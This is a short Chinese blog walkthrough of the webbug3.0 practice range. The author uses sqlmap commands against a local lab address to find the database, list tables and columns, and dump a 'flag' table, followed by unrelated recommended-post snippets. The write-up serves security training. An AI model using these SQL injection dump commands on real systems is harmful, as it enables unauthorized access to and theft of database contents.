webbug3.0靶场

witer 2018-07-27 原文

目标一，由于用的kli系统，所以没有去手动注入，用了sqlmap来注入检测

先用sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” –current-db查看当前数据库得到数据库pentesterlab

然后查看当前数据库的表sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab –table

一看这个flag表就知道肯定是它了

用sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag –columns 看一下表里面的字段

看到有两个字段flag和id，直接暴flag字段内容

sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag -C flag –dump –batch
（–batch自动化不询问，–dump把结果导出）

posted on 2018-07-27 16:51 莫违阅读(…) 评论(…) 编辑收藏

随机推荐

<?php /*抽象类的应用 //场景：判断不同来源，显示不同提示文字面向过程如下处理$a=\R […]...

使用的uboot版本是1.1.6，是打过u-boot-1.1.6_jz2440.patch的； kernel使 […]...

好久没有用SQL统计数据了，今天接到一个临时任务，统计下药店的覆盖率，一通操作猛如虎，数据很快导出来了，但一细 […]...

网址导航 – merrynuts

网址导航 51ape 综合网站搜狐新浪腾讯网易凤凰网百度哔哩哔哩有道词典剑桥词典牛津字典 […]...

Hadoop-yarn_工作流程详解YARN的基本结构由一个ResourceManager与多个NodeManager组成。ResourceManager负责对NodeManager所持有的资源进行统一管理和调度。当在处理一个作业时Re...

redis 系列9 对象类型(字符串，哈希，列表，集合，有序集合)与数据结构关系一.概述　　在前面章节中， […]...

上一篇写了,基于netty实现的rpc的微框架,其中详细介绍netty的原理及组件,这篇就不过多介绍这篇实现 […]...

目录简介 while语句 if 语句 for语句 Break Continue pass 简介流程控制无非 […]...

webbug3.0靶场的更多相关文章